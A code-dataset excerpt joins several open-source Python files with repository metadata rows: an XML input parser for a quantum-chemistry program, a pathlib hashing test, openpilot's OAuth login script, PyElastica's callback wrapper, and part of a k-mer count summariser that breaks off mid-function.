return self.parent_object.get_counter_value(counter_name)
else:
return -1
def set_parameter_value(self, parameter_definition, value):
"""
Set an arbitrary value 'value' for the parameter with definition
'parameter_definition'.
"""
# convert the value to right data type and check that it is valid
final_value = self.convert_argument_value(value, parameter_definition)
# check that value is within given limits
self.check_value_range(final_value, parameter_definition)
# set the parameter value
self.parameter_values[parameter_definition.attrib['name']] = final_value
@staticmethod
def read_tag_or_attribute_value(root, name):
"""
Reads the value of a tag or attribute with name 'name' in an xml. If
attribute or tag is not found, None is returned.
"""
value = None
if root is not None:
tag = root.find(name)
if tag is not None:
value = tag.text
elif name in root.attrib:
value = root.attrib[name]
return value
def read_parameter_value(self, parameter_definition):
"""
Read the value of the parameter first from the values of the XML-element,
secondarily from the objects we are extending from and thirdly from
the default value of the parameter definition.
"""
value = InputXML.read_tag_or_attribute_value(self.root, parameter_definition.attrib['name'])
# if value is not found at root, then use the value from extends roots
if value is None and hasattr(self, 'extends_roots') and self.extends_roots is not None:
for extends_root in self.extends_roots:
value = InputXML.read_tag_or_attribute_value(extends_root, parameter_definition.attrib['name'])
# if value is found, break the iteration
if value is not None:
break
# fall back to default value/or None if one is not specified
if value is None:
if 'default' in parameter_definition.attrib:
value = parameter_definition.attrib['default']
return value
def get_parameter_value(self, parameter_name):
"""
Get the value of the parameter from the parsed parameters.
If the parameter is not found an InputProgrammingError
is raised.
"""
if hasattr(self, 'parameter_values') and parameter_name in self.parameter_values:
return self.parameter_values[parameter_name]
else:
raise InputProgrammingError("Accessed parameter: '{}' is not in the values ".format(parameter_name)+ \
"of the object. Have you perfomed 'parse' for the object?")
def parameter_values_are_equal(self, other, parameter_name):
"""
Compare the values of parameter with name 'parameter_name' for
two objects of the same type.
"""
# check that the input objects are of same type
if type(self) != type(other):
raise InputProgrammingError("The objects compared with parameter_values_are_equal"+
" are not of same type.")
# get the values for both input objects
self_value = self.get_parameter_value(parameter_name)
other_value = other.get_parameter_value(parameter_name)
if isinstance(self_value, list) or isinstance(self_value, numpy.ndarray):
if len(self_value) != len(other_value):
return False
for i in range(len(self_value)):
if type(self_value[i]) == float or type(self_value[i]) == numpy.float64 or type(self_value[i]) == numpy.float32 or type(self_value[i]) == numpy.float16:
if abs(self_value[i] - other_value[i]) > 1e-10:
return False
elif self_value[i] != other_value[i]:
return False
return True
else:
return self_value == other_value
def all_parameter_values_are_equal(self, other):
"""
Check if all parameter values of 'self' and 'other'
are equal
"""
for parameter_name in self.parameter_values:
if not self.parameter_values_are_equal(other, parameter_name):
return False
return True
def is_of_same_type_as(self, other):
"""
Check if self is of same type as other
"""
return type(self) == type(other) \
and self.definition.attrib['name'] == other.definition.attrib['name']
def children_are_equal(self, other):
"""
Check if children of 'self' and 'other' are equal with definition
and value
"""
for child in self.children:
equal_found = False
# go through all the children and check if there is equal
for other_child in other.children:
if child == other_child:
equal_found = True
# if not, the children cannot be equal
if not equal_found:
return False
return True
def __eq__(self, other):
"""
Check if two InputXML objects are equal with each other
"""
return self.is_of_same_type_as(other)\
and self.all_parameter_values_are_equal(other)\
and self.children_are_equal(other)
def __ne__(self, other):
return not self.__eq__(other)
def read_array_values(self, value_text, argument_type):
is_number = argument_type.startswith("int") or \
argument_type.startswith("float") or \
argument_type.startswith("double")
# try to evaluate the molecular orbitals as dict
try:
dictionary = ast.literal_eval("{"+ value_text +"}")
size = max(dictionary.keys())
# init array of size
if is_number:
result = [0] * size
else:
result = [None] * size
for key in dictionary:
# convert the indexing from the 1-starting to 0-starting
result[key-1] = dictionary[key]
except:
try:
result = ast.literal_eval("["+ value_text +"]")
except:
raise Exception("Bad form of array, should have a list or a dictionary, value is: {}.".format(value_text))
return result
def convert_argument_value(self, value_text, parameter_definition):
argument_type = parameter_definition.attrib['type']
if SettingsGenerator.has_options(parameter_definition):
value_text = self.get_option_value(value_text, parameter_definition)
if SettingsGenerator.is_array(parameter_definition):
if value_text is None:
value = None
else:
# do the parsing of the input array (could also be a dictionary), which
# has to be changed to a list
array_values = self.read_array_values(value_text, argument_type)
# get the final size of the result array from the parameter definition
size = int(parameter_definition.attrib['shape'])
value = numpy.zeros(size)
try:
for i, arg in enumerate(array_values):
if argument_type.startswith('int'):
value[i] = int(arg)
if argument_type.startswith('float'):
value[i] = float(arg)
if argument_type.startswith('double'):
value[i] = float(arg)
if argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value[i] = str(arg)
else:
value[i] = str(arg)
if argument_type.startswith('bool'):
if arg.lower() == 'false':
value[i] = False
elif arg.lower() == 'true':
value[i] = True
else:
value[i] = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
else:
try:
if value_text is None:
value = None
elif argument_type.startswith('int'):
value = int(value_text)
elif argument_type.startswith('float'):
value = float(value_text)
elif argument_type.startswith('double'):
value = float(value_text)
elif argument_type.startswith('string'):
if SettingsGenerator.generate_fortran(parameter_definition):
value = str(value_text)
else:
value = str(value_text)
elif argument_type.startswith('bool'):
if value_text.lower() == 'false':
value = False
elif value_text.lower() == 'true':
value = True
else:
value = bool(arg)
except ValueError:
sys.exit('Error: parameter with type \'{}\' and name \'{}\' has invalid value: \'{}\''.format(argument_type, parameter_definition.attrib['name'], value_text))
return value
def check_value_range(self, value, parameter_definition):
if value is not None:
if 'minval' in parameter_definition.attrib:
minval = parameter_definition.attrib['minval']
if value < float(minval):
sys.exit('Error: argument with name {} and value {} is smaller than the smallest allowed value: {}', parameter_definition.attrib['name'], value, float(minval))
if 'maxval' in parameter_definition.attrib:
maxval = parameter_definition.attrib['maxval']
if value > float(maxval):
sys.exit('Error: argument with name {} and value {} is larger than the largest allowed value: {}', parameter_definition.attrib['name'], value, float(maxval))
def get_option_value(self, value_text, parameter_definition):
options = parameter_definition.findall('option')
result = None
if len(options) > 0:
valid_options = ""
for option in options:
if 'value' in option.attrib and value_text == option.attrib['value']:
return value_text
elif 'text_value' in option.attrib and value_text == option.attrib['text_value']:
return option.attrib['value']
else:
valid_options += ("{}: {} ".format(option.attrib['value'], option.attrib['text_value']))
sys.exit('Error: The value "{}" for argument with name "{}" is not within allowed options: {} '.format(value_text, parameter_definition.attrib['name'], valid_options))
def get_root_object(self):
if self.parent_object is None:
return self
else:
return self.parent_object.get_root_object()
class SCFEnergeticsXML(InputXML):
tag_type = 'scf_energetics'
definition_tag = 'scf_energetics_input'
class ActionXML(InputXML):
tag_type = 'action'
definition_tag = 'action_input'
def parse(self):
super(ActionXML, self).parse()
self.handle_output_files()
def handle_output_files(self):
"""
Reads in the output files and creates the corresponding
objects to the tree
"""
if 'output_folder' in self.parameter_values:
scf_energetics_filename = \
os.path.join(self.parameter_values['output_folder'], "scf_energetics.xml")
root_object = self.get_root_object()
# if scf energetics file exists, parse it and add as a child of the root
# and set it as the input scf energetics of the action
if os.path.exists(os.path.join(self.directory, scf_energetics_filename)):
scf_energetics_definition = root_object.definition.find('scf_energetics_input')
scf_energetics = SCFEnergeticsXML(parent_object = root_object, \
definition = scf_energetics_definition)
scf_energetics.root = scf_energetics.retrieve_path(scf_energetics_filename, scf_energetics.directory)
root_object.children.append(scf_energetics)
root_object.child_definitions.append('scf_energetics')
root_object.add_counters(scf_energetics)
scf_energetics.parse()
scf_energetics_id_definition = self.get_parameter_definition('scf_energetics_id')
self.set_parameter_value(scf_energetics_id_definition, scf_energetics.id)
structure_filename = \
os.path.join(self.parameter_values['output_folder'], "structure.xml")
# if structure file exists, parse it and add it as a child of the root
# and set it as the input structure of the action
if os.path.exists(os.path.join(self.directory, structure_filename)):
structure_definition = root_object.definition.find('structure_input')
structure = StructureXML(parent_object = root_object, \
definition = structure_definition)
structure.root = structure.retrieve_path(structure_filename, structure.directory)
root_object.children.append(structure)
root_object.child_definitions.append('structure')
root_object.add_counters(structure)
structure.parse()
structure_id_definition = self.get_parameter_definition('structure_id')
self.set_parameter_value(structure_id_definition, structure.id)
class BasisSetXML(InputXML):
tag_type = 'basis_set'
definition_tag = 'basis_set_input'
class SettingsXML(InputXML):
tag_type = 'settings'
definition_tag = 'settings_input'
class StructureXML(InputXML):
tag_type = 'structure'
definition_tag = 'structure_input'
atom_types = {'H':1, 'He':2, 'Li':3, 'Be':4, 'B':5, 'C':6, 'N':7, 'O':8, 'F':9, 'Ne':10, 'Na': 11, 'Mg':12, 'Al':13, 'Si':14, 'P':15, 'S':16, 'Cl':17, 'Ar':18}
def read_input(self):
charge = self.root.find('charge')
# read relative charge
if (charge is not None):
self.charge = int(charge.text)
else:
self.charge = 0
# read coordinates and atom types
self.coordinates = []
self.types = []
self.charges = []
# first read atom coordinates in 'atom' tags
for i, atom in enumerate(self.root.findall('atom')):
self.read_atom_coordinates_and_type(atom)
# then read atoms in 'atoms' tags
for i, atoms in enumerate(self.root.findall('atoms')):
self.read_atoms_coordinates_and_types(atoms)
def read_atom_coordinates_and_type(self, atom):
result = [0.0, 0.0, 0.0]
x = atom.find('x')
if (x is not None):
result[0] = float(x.text)
y = atom.find('y')
if (y is not None):
result[1] = float(y.text)
z = atom.find('z')
if (z is not None):
result[2] = float(z.text)
xyz = atom.find('xyz')
atom_type = self.read_atom_type(atom)
if (xyz is not None):
xyz_text = xyz.text.strip().split(" ")
if (len(xyz_text) == 4):
atom_type = get_atom_type(xyz_text[0])
atom_charge = get_atom_charge(xyz_text[0])
result[0] = float(xyz_text[1])
result[1] = float(xyz_text[2])
result[2] = float(xyz_text[3])
else:
sys.exit("Error: Too many or too few coordinates in 'atom'->'xyz' -tag.")
self.coordinates.append(result)
self.types.append(atom_type)
self.charges.append(atom_charge)
def get_atom_type(self, atom_type_text):
return int(self.atom_types[atom_type_text])
def get_atom_charge(self, atom_type_text):
return float(self.atom_types[atom_type_text])
def read_atom_type(self, atom):
if 'type' in atom.attrib:
return atom.attrib['type']
else:
sys.exit("Error: The mandatory attribute 'type' not found in 'atom'-tag")
def read_atoms_coordinates_and_types(self, atoms):
xyz = atoms.find('xyz')
coordinates = []
types = []
charges = []
if (xyz is not None):
xyz_lines = xyz.text.splitlines()
for xyz in xyz_lines:
xyz_text = xyz.strip().split(" ")
xyz_coord = [0.0, 0.0, 0.0]
# ignore empty lines
if (len(xyz_text) == 1 and xyz_text[0] == ""):
continue
elif (len(xyz_text) == 4):
types.append(self.get_atom_type(xyz_text[0]))
charges.append(self.get_atom_charge(xyz_text[0]))
xyz_coord[0] = float(xyz_text[1])
xyz_coord[1] = float(xyz_text[2])
xyz_coord[2] = float(xyz_text[3])
coordinates.append(xyz_coord)
else:
sys.exit("Error: Too many or too few coordinates in 'atoms'->'xyz' -line.")
self.coordinates.extend(coordinates)
self.types.extend(types)
self.charges.extend(charges)
if __name__ == "__main__":
if len(sys.argv) <= 1:
print("Give the input file name as an input.")
else:
inp = InputXML(filename = sys.argv[1], definition_filename = os.path.dirname(os.path.realpath(__file__))+"/input_parameters.xml")
import dage_fortran
dage_fortran.python_interface.run(**inp.prepare())
| 47.020948
| 179
| 0.559487
| 4,646
| 42,648
| 4.959535
| 0.105252
| 0.010416
| 0.014061
| 0.016275
| 0.393803
| 0.285305
| 0.228105
| 0.204149
| 0.169951
| 0.135622
| 0
| 0.004375
| 0.356898
| 42,648
| 906
| 180
| 47.072848
| 0.835746
| 0.170559
| 0
| 0.245347
| 0
| 0
| 0.075603
| 0.001987
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06599
| false
| 0.001692
| 0.011844
| 0.005076
| 0.175973
| 0.013536
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d27a9aec4e8518393324c6681b93cf4f6993a5
| 506
|
py
|
Python
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 9
|
2017-09-07T21:21:43.000Z
|
2020-10-11T09:47:24.000Z
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2018-10-16T14:30:26.000Z
|
2020-12-05T02:40:46.000Z
|
tests/test_mate_hashes_methods.py
|
MacHu-GWU/pathlib_mate-project
|
5b8f5441e681730d02209211cce7f46986147418
|
[
"MIT"
] | 2
|
2017-09-05T14:06:01.000Z
|
2021-06-29T15:31:13.000Z
|
# -*- coding: utf-8 -*-
import pytest
from pathlib_mate.pathlib2 import Path
class TestHashesMethods(object):
def test(self):
p = Path(__file__)
assert len({
p.md5, p.get_partial_md5(nbytes=1 << 20),
p.sha256, p.get_partial_sha256(nbytes=1 << 20),
p.sha512, p.get_partial_sha512(nbytes=1 << 20),
}) == 3
if __name__ == "__main__":
import os
basename = os.path.basename(__file__)
pytest.main([basename, "-s", "--tb=native"])
| 23
| 59
| 0.592885
| 66
| 506
| 4.19697
| 0.560606
| 0.043321
| 0.119134
| 0.072202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 0.254941
| 506
| 21
| 60
| 24.095238
| 0.665782
| 0.041502
| 0
| 0
| 0
| 0
| 0.043478
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 1
| 0.071429
| false
| 0
| 0.214286
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d2a60bb0dcf9c3c7f564f0707f97c252020d5c
| 4,183
|
py
|
Python
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 121
|
2019-03-27T06:34:51.000Z
|
2021-06-15T14:37:29.000Z
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 54
|
2019-04-11T08:51:58.000Z
|
2021-06-13T17:04:22.000Z
|
tools/lib/auth.py
|
shoes22/openpilot
|
a965de3c96a53b67d106cfa775e3407db82dd0e1
|
[
"MIT"
] | 139
|
2019-07-16T07:25:05.000Z
|
2021-06-09T11:27:53.000Z
|
#!/usr/bin/env python3
"""
Usage::
usage: auth.py [-h] [{google,apple,github,jwt}] [jwt]
Login to your comma account
positional arguments:
{google,apple,github,jwt}
jwt
optional arguments:
-h, --help show this help message and exit
Examples::
./auth.py # Log in with google account
./auth.py github # Log in with GitHub Account
./auth.py jwt ey......hw # Log in with a JWT from https://jwt.comma.ai, for use in CI
"""
import argparse
import sys
import pprint
import webbrowser
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Any, Dict
from urllib.parse import parse_qs, urlencode
from tools.lib.api import APIError, CommaApi, UnauthorizedError
from tools.lib.auth_config import set_token, get_token
PORT = 3000
class ClientRedirectServer(HTTPServer):
query_params: Dict[str, Any] = {}
class ClientRedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
if not self.path.startswith('/auth'):
self.send_response(204)
return
query = self.path.split('?', 1)[-1]
query = parse_qs(query, keep_blank_values=True)
self.server.query_params = query
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(b'Return to the CLI to continue')
def log_message(self, format, *args): # pylint: disable=redefined-builtin
pass # this prevent http server from dumping messages to stdout
def auth_redirect_link(method):
provider_id = {
'google': 'g',
'apple': 'a',
'github': 'h',
}[method]
params = {
'redirect_uri': f"https://api.comma.ai/v2/auth/{provider_id}/redirect/",
'state': f'service,localhost:{PORT}',
}
if method == 'google':
params.update({
'type': 'web_server',
'client_id': '45471411055-ornt4svd2miog6dnopve7qtmh5mnu6id.apps.googleusercontent.com',
'response_type': 'code',
'scope': 'https://www.googleapis.com/auth/userinfo.email',
'prompt': 'select_account',
})
return 'https://accounts.google.com/o/oauth2/auth?' + urlencode(params)
elif method == 'github':
params.update({
'client_id': '28c4ecb54bb7272cb5a4',
'scope': 'read:user',
})
return 'https://github.com/login/oauth/authorize?' + urlencode(params)
elif method == 'apple':
params.update({
'client_id': 'ai.comma.login',
'response_type': 'code',
'response_mode': 'form_post',
'scope': 'name email',
})
return 'https://appleid.apple.com/auth/authorize?' + urlencode(params)
else:
raise NotImplementedError(f"no redirect implemented for method {method}")
def login(method):
oauth_uri = auth_redirect_link(method)
web_server = ClientRedirectServer(('localhost', PORT), ClientRedirectHandler)
print(f'To sign in, use your browser and navigate to {oauth_uri}')
webbrowser.open(oauth_uri, new=2)
while True:
web_server.handle_request()
if 'code' in web_server.query_params:
break
elif 'error' in web_server.query_params:
print('Authentication Error: "%s". Description: "%s" ' % (
web_server.query_params['error'],
web_server.query_params.get('error_description')), file=sys.stderr)
break
try:
auth_resp = CommaApi().post('v2/auth/', data={'code': web_server.query_params['code'], 'provider': web_server.query_params['provider']})
set_token(auth_resp['access_token'])
except APIError as e:
print(f'Authentication Error: {e}', file=sys.stderr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Login to your comma account')
parser.add_argument('method', default='google', const='google', nargs='?', choices=['google', 'apple', 'github', 'jwt'])
parser.add_argument('jwt', nargs='?')
args = parser.parse_args()
if args.method == 'jwt':
if args.jwt is None:
print("method JWT selected, but no JWT was provided")
exit(1)
set_token(args.jwt)
else:
login(args.method)
try:
me = CommaApi(token=get_token()).get('/v1/me')
print("Authenticated!")
pprint.pprint(me)
except UnauthorizedError:
print("Got invalid JWT")
exit(1)
| 28.650685
| 140
| 0.672962
| 536
| 4,183
| 5.126866
| 0.384328
| 0.029476
| 0.043304
| 0.043668
| 0.049491
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014052
| 0.183361
| 4,183
| 145
| 141
| 28.848276
| 0.790398
| 0.130528
| 0
| 0.161616
| 0
| 0
| 0.283154
| 0.026192
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040404
| false
| 0.010101
| 0.090909
| 0
| 0.20202
| 0.080808
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d51d8a99234145a06442d575334e8b8cd54c32
| 4,762
|
py
|
Python
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 71
|
2020-04-15T17:02:42.000Z
|
2022-03-26T04:53:51.000Z
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 59
|
2020-05-15T03:51:46.000Z
|
2022-03-28T13:53:01.000Z
|
elastica/wrappers/callbacks.py
|
zhidou2/PyElastica
|
0f5502bc5349ab5e5dc794d8dfc82b7c2bd69eb6
|
[
"MIT"
] | 57
|
2020-06-17T20:34:02.000Z
|
2022-03-16T08:09:54.000Z
|
__doc__ = """
CallBacks
-----------
Provides the callBack interface to collect data over time (see `callback_functions.py`).
"""
from elastica.callback_functions import CallBackBaseClass
class CallBacks:
"""
CallBacks class is a wrapper for calling callback functions, set by the user. If the user
wants to collect data from the simulation, the simulator class has to be derived
from the CallBacks class.
Attributes
----------
_callbacks: list
List of call back classes defined for rod-like objects.
"""
def __init__(self):
self._callbacks = []
super(CallBacks, self).__init__()
def collect_diagnostics(self, system):
"""
This method calls user-defined call-back classes for a
user-defined system or rod-like object. You need to input the
system or rod-like object that you want to collect data from.
Parameters
----------
system: object
System is a rod-like object.
Returns
-------
"""
sys_idx = self._get_sys_idx_if_valid(system)
# Create _Constraint object, cache it and return to user
_callbacks = _CallBack(sys_idx)
self._callbacks.append(_callbacks)
return _callbacks
def _finalize(self):
# From stored _CallBack objects, instantiate the boundary conditions
# inplace : https://stackoverflow.com/a/1208792
# dev : the first index stores the rod index to collect data.
# Technically we can use another array but it its one more book-keeping
# step. Being lazy, I put them both in the same array
self._callbacks[:] = [
(callback.id(), callback(self._systems[callback.id()]))
for callback in self._callbacks
]
# Sort from lowest id to highest id for potentially better memory access
# _callbacks contains list of tuples. First element of tuple is rod number and
# following elements are the type of boundary condition such as
# [(0, MyCallBack), (1, MyVelocityCallBack), ... ]
# Thus using lambda we iterate over the list of tuples and use rod number (x[0])
# to sort callbacks.
self._callbacks.sort(key=lambda x: x[0])
self._callBack(time=0.0, current_step=0)
# TODO: same as above naming of _callBack function
def _callBack(self, time, current_step: int, *args, **kwargs):
for sys_id, callback in self._callbacks:
callback.make_callback(
self._systems[sys_id], time, current_step, *args, **kwargs
)
class _CallBack:
"""
CallBack wrapper private class
Attributes
----------
_sys_idx: rod object index
_callback_cls: list
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
"""
def __init__(self, sys_idx: int):
"""
Parameters
----------
sys_idx: int
"""
self._sys_idx = sys_idx
self._callback_cls = None
self._args = ()
self._kwargs = {}
def using(self, callback_cls, *args, **kwargs):
"""
This method is a wrapper to set which callback class is used to collect data
from user defined rod-like object.
Parameters
----------
callback_cls: object
User defined callback class.
*args
Variable length argument list
**kwargs
Arbitrary keyword arguments.
Returns
-------
"""
assert issubclass(
callback_cls, CallBackBaseClass
), "{} is not a valid call back. Did you forget to derive from CallBackClass?".format(
callback_cls
)
self._callback_cls = callback_cls
self._args = args
self._kwargs = kwargs
return self
def id(self):
return self._sys_idx
def __call__(self, *args, **kwargs):
"""Constructs a callback functions after checks
Parameters
----------
args
kwargs
Returns
-------
"""
if not self._callback_cls:
raise RuntimeError(
"No callback provided to act on rod id {0}"
"but a callback was registered. Did you forget to call"
"the `using` method".format(self.id())
)
try:
return self._callback_cls(*self._args, **self._kwargs)
except (TypeError, IndexError):
raise TypeError(
r"Unable to construct callback class.\n"
r"Did you provide all necessary callback properties?"
)
| 29.214724
| 94
| 0.584208
| 542
| 4,762
| 4.972325
| 0.350554
| 0.040816
| 0.024119
| 0.018924
| 0.060853
| 0.045269
| 0.045269
| 0.045269
| 0.045269
| 0
| 0
| 0.004685
| 0.327593
| 4,762
| 162
| 95
| 29.395062
| 0.836977
| 0.414112
| 0
| 0
| 0
| 0
| 0.161223
| 0.010469
| 0
| 0
| 0
| 0.006173
| 0.016949
| 1
| 0.135593
| false
| 0
| 0.016949
| 0.016949
| 0.254237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
d5d5b53df6261a4974bd6d3bb678fc4435a6413e
| 15,032
|
py
|
Python
|
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
scripts/summarize-kmer-counts.py
|
rpetit3/anthrax-metagenome-study
|
b4a6f2c4d49b57aeae898afd6a95c8f6cb437945
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python3
"""Parse through the simulated sequencing group specific kmer counts."""
import argparse as ap
from collections import OrderedDict
import glob
import gzip
import os
import sys
import time
import numpy as np
import multiprocessing as mp
SAMPLES = OrderedDict()
KMERS = {}
HAMMING = OrderedDict()
SAMPLE_COLS = [
'sample', 'is_bcg', 'is_ba', 'has_lethal', 'simulated_coverage', 'group',
'total_kmers', 'tp', 'tn', 'fp', 'fn',
'kmer_cov_min', 'kmer_cov_mean', 'kmer_cov_median', 'kmer_cov_max',
'non_zero_kmer_cov_min', 'non_zero_kmer_cov_mean',
'non_zero_kmer_cov_median', 'non_zero_kmer_cov_max'
]
KMER_COLS = [
'kmer', 'simulated_coverage', 'group', 'hamming_distance',
'tp', 'tn', 'fp', 'fn',
'group_kmer_cov_min',
'group_kmer_cov_mean',
'group_kmer_cov_median',
'group_kmer_cov_max',
'non_zero_group_kmer_cov_min',
'non_zero_group_kmer_cov_mean',
'non_zero_group_kmer_cov_median',
'non_zero_group_kmer_cov_max',
'outgroup_kmer_cov_min',
'outgroup_kmer_cov_mean',
'outgroup_kmer_cov_median',
'outgroup_kmer_cov_max',
'non_zero_outgroup_kmer_cov_min',
'non_zero_outgroup_kmer_cov_mean',
'non_zero_outgroup_kmer_cov_median',
'non_zero_outgroup_kmer_cov_max'
]
def get_group_status(sample, group):
"""Return if a sample is within a group or not."""
within_group = None
if group == 'ba':
within_group = True if SAMPLES[sample]['is_ba'] == 'True' else False
elif group == 'bcg':
within_group = True if SAMPLES[sample]['is_bcg'] == 'True' else False
else:
# lef
within_group = True if SAMPLES[sample]['has_lethal'] else False
return within_group
def get_coverage_stats(coverage):
"""Return summary stats of a set of coverages."""
non_zero = [c for c in coverage if c]
np_array = np.array(coverage)
non_zero_array = np.array(non_zero)
return {
'min': min(coverage) if coverage else 0,
'median': int(np.median(np_array)) if coverage else 0,
'mean': "{0:.4f}".format(np.mean(np_array)) if coverage else 0,
'max': max(coverage) if coverage else 0,
'non_zero_min': min(non_zero_array) if non_zero else 0,
'non_zero_median': int(np.median(non_zero_array)) if non_zero else 0,
'non_zero_mean': int(round(np.mean(non_zero_array))) if non_zero else 0,
'non_zero_max': max(non_zero_array) if non_zero else 0,
}
def reverse_complement(seq):
"""Reverse complement a DNA sequence."""
complement = {
'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G',
'a': 't', 't': 'a', 'g': 'c', 'c': 'g'
}
return ''.join([complement[b] for b in seq[::-1]])
def parse_counts(counts, sample, coverage, group, skip_kmers=False,
filter_kmers=False):
"""Parse kmer counts."""
within_group = get_group_status(sample, group)
sample_row = {'coverages': [], 'tp': 0, 'tn': 0, 'fp': 0, 'fn': 0}
with gzip.open(counts, 'r') as count_handle:
for line in count_handle:
kmer, count = line.decode().rstrip().split()
count = int(count)
parse = True
if filter_kmers:
parse = kmer in KMERS or reverse_complement(kmer) in KMERS
elif not skip_kmers:
if kmer not in KMERS:
kmer = reverse_complement(kmer)
if within_group:
KMERS[kmer][coverage]['group_coverages'].append(count)
if count:
KMERS[kmer][coverage]['tp'] += 1
else:
KMERS[kmer][coverage]['fn'] += 1
else:
KMERS[kmer][coverage]['outgroup_coverages'].append(count)
if count:
KMERS[kmer][coverage]['fp'] += 1
else:
KMERS[kmer][coverage]['tn'] += 1
if parse:
sample_row['coverages'].append(count)
if within_group:
if count:
sample_row['tp'] += 1
else:
sample_row['fn'] += 1
else:
if count:
sample_row['fp'] += 1
else:
sample_row['tn'] += 1
coverage_stats = get_coverage_stats(sample_row['coverages'])
SAMPLES[sample]['results'].append({
'simulated_coverage': coverage,
'within_group': within_group,
'tp': sample_row['tp'],
'tn': sample_row['tn'],
'fp': sample_row['fp'],
'fn': sample_row['fn'],
'kmer_cov_min': coverage_stats['min'],
'kmer_cov_mean': coverage_stats['mean'],
'kmer_cov_median': coverage_stats['median'],
'kmer_cov_max': coverage_stats['max'],
'non_zero_kmer_cov_min': coverage_stats['non_zero_min'],
'non_zero_kmer_cov_mean': coverage_stats['non_zero_mean'],
'non_zero_kmer_cov_median': coverage_stats['non_zero_median'],
'non_zero_kmer_cov_max': coverage_stats['non_zero_max'],
})
def parse_kmers(kmers, coverages, skip_kmers=False, has_hamming=True):
with open(kmers, 'r') as kmer_handle:
for line in kmer_handle:
if line.startswith(">"):
line = line.rstrip().replace(">", "")
kmer, distance = line.split("-")
if not has_hamming:
distance = False
KMERS[kmer] = OrderedDict()
HAMMING[kmer] = distance
if not skip_kmers:
for coverage in coverages:
KMERS[kmer][coverage] = {
'group_coverages': [], 'outgroup_coverages': [],
'tp': 0, 'tn': 0, 'fp': 0, 'fn': 0
}
def parse_summary(summary):
"""Parse Summary file."""
cols = None
with open(summary, 'r') as summary_handle:
# Column Names:
# accession, gi, is_bcg, is_ba, species, genome_size, description
for line in summary_handle:
line = line.rstrip()
if line.startswith('#'):
cols = line.replace('#', '').split('\t')
else:
row = dict(zip(cols, line.split('\t')))
SAMPLES[row['accession']] = row
if row['accession'] == 'NZ_CP009941':
# NZ_CP009941 - Bacillus cereus w/ lef on chromosome
SAMPLES[row['accession']]['has_lethal'] = True
else:
SAMPLES[row['accession']]['has_lethal'] = False
SAMPLES[row['accession']]['results'] = []
def print_sample_summary(file_output):
"""Print the final per sample summaries."""
with open(file_output, 'w') as output_handle:
output_handle.write(("\t".join(SAMPLE_COLS)))
output_handle.write("\n")
for sample in SAMPLES:
if SAMPLES[sample]['results']:
for result in SAMPLES[sample]['results']:
row = {
'sample': sample,
'is_bcg': SAMPLES[sample]['is_bcg'],
'is_ba': SAMPLES[sample]['is_ba'],
'has_lethal': SAMPLES[sample]['has_lethal'],
'simulated_coverage': result['simulated_coverage'],
'group': args.group,
'within_group': result['within_group'],
'total_kmers': total_kmers,
'tp': result['tp'],
'tn': result['tn'],
'fp': result['fp'],
'fn': result['fn'],
'kmer_cov_min': result['kmer_cov_min'],
'kmer_cov_mean': result['kmer_cov_mean'],
'kmer_cov_median': result['kmer_cov_median'],
